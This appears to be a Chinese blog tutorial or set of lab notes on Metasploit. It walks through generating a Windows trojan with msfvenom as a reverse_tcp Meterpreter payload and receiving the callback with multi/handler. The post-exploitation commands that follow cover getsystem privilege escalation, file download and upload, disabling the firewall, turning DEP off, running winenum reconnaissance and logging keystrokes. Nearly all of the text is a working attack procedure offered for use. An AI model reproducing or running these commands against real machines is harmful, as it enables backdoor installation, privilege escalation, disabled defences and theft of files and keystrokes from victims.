木马与Meterpreter shell
命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.192 LPORT=4444-a x86 --platform windows -f exe -o /home/tyr/Desktop/hack.exe 生成木马
针对msf中的payload reverse_tcp 的监听需要msf中的监听模块打开msfconsole
使用 exploit/multi/handler 监听模块(用于接收木马的回弹请求)
设定监听的回弹请求类型为木马使用的payload类型 windows/meterpreter/reverse_tcp
设置在本机监听 set LHOST 192.168.1.192
注意:设置的payload要和我们生成木马所使用的payload一样。
靶机执行木马文件hack.exe,之后几乎同时监听窗口接收到回弹请求
成功获取到meterpreter shell,用以利用msf框架中丰富的扩展模块进行后渗透操作
一般来说meterpreter shell的权限(运行木马程序的权限)都不是管理员权限,所以需要通过命令来提权才能进行一些敏感操作。
可以看到当前shell用户,(因此shell拥有的权限即为当前用户所拥有的权限)
使用命令 getsystem h 提升权限,命令 getsystem -t 1再次使用 getuid
使用命令 download "C:\Users\tyr\Desktop\hack.txt" 下载目标机器中的hack.txt
upload /home/tyr/tangyanran.txt "E:\ruqin"
使用命令 shell 可以获得目标机windows命令行窗口,可使用 exit 退出
使用命令 netsh advfirewall set allprofiles state off
使用命令 Bcdedit.exe / set {current} nx Alwaysoff
使用命令 run winenum 自动执行命令收集信息并将结果保存到本地
使用命令 keyscan_start 、 keyscan_dump 、 keyscan_stop 进行键盘记录开始、导出、停止。

浙公网安备 33010602011771号